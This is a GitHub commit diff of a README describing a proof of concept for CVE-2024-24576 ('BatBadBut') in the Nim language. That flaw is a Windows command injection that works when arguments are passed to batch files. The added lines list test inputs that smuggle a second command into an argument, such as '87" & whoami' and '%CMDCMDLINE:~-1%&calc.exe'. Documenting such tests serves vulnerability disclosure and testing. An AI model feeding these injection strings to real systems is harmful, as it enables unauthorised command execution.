| 1 | | - | # CVE-2024-24576-PoC---Nim |
| 2 | | - | CVE-2024-24576 PoC for Nim Lang |
| | 1 | + | # CVE-2024-24576-PoC for Nim Lang |
| | 2 | + | This is a POC for nim lang to apply the `BatBadBut` command injection vulnerability in Windows where attackers can inject commands via batch files due to the way the CreateProcess function and cmd.exe parsing rules interact. |
| | 3 | + | |
| | 4 | + | ## Which nim versionis affected: |
| | 5 | + | All |
| | 6 | + | |
| | 7 | + | ## How to test it: |
| | 8 | + | |
| | 9 | + | Use the main.nim to test it like this: |
| | 10 | + | |
| | 11 | + | ## First test `Double Qoute Escape` |
| | 12 | + | 55" & calc |
| | 13 | + | 87" & whoami |
| | 14 | + | |
| | 15 | + | ## 2nd test |
| | 16 | + | %CMDCMDLINE:~-1%&calc.exe |
| 3 | 17 | | |
Sultan Al Isaiee
committed
with
GitHub
1 month ago
1 parent 672fe301